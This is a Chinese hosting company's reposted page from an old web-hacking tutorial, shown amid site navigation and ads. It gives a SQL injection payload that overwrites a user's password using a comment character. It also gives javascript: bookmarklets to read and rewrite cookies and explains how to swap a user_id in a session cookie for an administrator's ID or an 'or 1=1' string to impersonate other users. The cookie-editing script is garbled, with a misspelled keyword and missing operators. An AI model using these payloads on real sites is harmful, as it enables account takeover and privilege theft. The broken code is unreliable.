手机站
网通分站
电信主站
密 码:
用户名:
当前位置 : 主页>网站运营>建站经验>列表

HACKING WITH

来源:互联网 作者:west263.com 时间:2008-04-16
西部数码-全国虚拟主机10强!40余项虚拟主机管理功能,全国领先!双线多线虚拟主机南北访问畅通无阻!免费赠送企业邮局,.CN域名,自助建站480元起,免费试用7天,满意再付款! P4主机租用799元/月.月付免压金!


"UPDATE user_data SET user_password='mypassword',user_email='myemail',user_sex='gay',user_password='HACKED' WHERE
user_id=1 #' WHERE user_id=7382";

"#"这个是sql的注释符.


2.绕过session cookies

绕过基本的session cookie验证

很多情况下会话处理都是采用的cookie.假如页面没有正确处理session cookie,一个攻击者能够利用此缺陷更改自己的用户身份为其他用户.
cookies保存在"window.document.cookie".使用j avascript我们能够擦除,编辑,创建任意站点的cookies.这个要比一般的攻击方式复杂得多.这里我只简单的介绍一下"

查看cookies:
j avascript:alert(unescape(document.cookie));

修改cookies数据:

j avascript:alert(window.c=functiona(n,v,nv){ c=document.cookie;c=c.substring(c.indexOf(n) n.length,c.length);c=c.substring(1,(

(c.indexOf(";")>-1) ? c.indexOf(";") : c.length));nc=unescape(c).replace(v,nv);document.cookie=n "=" escape(nc);return

unescape(document.cookie); });alert(c(prompt("cookie name:",""),prompt("replace this value:",""),prompt("with::","")));


假设您在www.ima13370h4x0r.net以"John Doe"身份登录,您获得的cookie如下:

SessionData=a:3:{ s:11:"SessionUser";s:5:"75959";s:9:"SessionID";i:70202768;s:9:"LastVisit";i:1078367189; }


我们只关心"75959"这个值,因为他是user_id的值.很多时候,您会发现有的站点把一些关键数据(比如user_id)保存在cookie中,这是个很严重的漏洞,因为任何用户都能够修改他们的user_id值为其他用户比如管理员用户的user_id值.
.
一旦您声明了window.c函数后,修改cookie的值就变得容易得多.首先把s:5:"75959"修改为s:x:"ADMINID",其中x是新值的长度.比如,您想把75959改为1,那么您必需把s:5:"75959"改成s:1:"1".有的时候一些站点会使用带WHERE子句的sql查询语句保持用户登录状态这个时候您需要把75959该为类似"13 or 1=1"这样的值.

注意:
嵌入的j avascript声明能够加到您的浏览器的收藏里,这样能够轻轻一点即可.声明您自己的函数用下面的形式:
"alert(window.newfunction = function (){ ... })"

文章整理:西部数码--专业提供域名注册虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!

上一页 1 2下一页
[打印] [关闭]
Google
相关文章
上一篇: 知己知彼——经典黑客远程网络攻击过程概要
下一篇: SQL注入和ASP木马上传的又一思路
热点关注
IDC资讯 虚拟主机 域名注册 托管租用 vps主机 智能建站
网站运营 建站经验 策划盈利 搜索优化 网站推广 免费资源
网站联盟 联盟新闻 联盟介绍 联盟点评 网赚技巧
行业资讯 业界动态 搜索引擎 网络游戏 门户动态 电子商务 广告传媒
网络编程 Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术 Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷 Internet Explorer
网页制作 FrontPages Dreamweaver Javascript css photoshop fireworks Flash
程序设计 Java技术 C/C++ VB delphi
网络知识 网络协议 网络安全 网络管理 组网方案 Cisco技术
操作系统 Win2000 WinXP Win2003 Mac OS Linux FreeBSD
返回首页 |关于我们 | 联系我们 | 付款方式 | 创业联盟 | 价格总览 | 资讯中心 | 友情链接 | 网站地图 | 招贤纳士 | RSS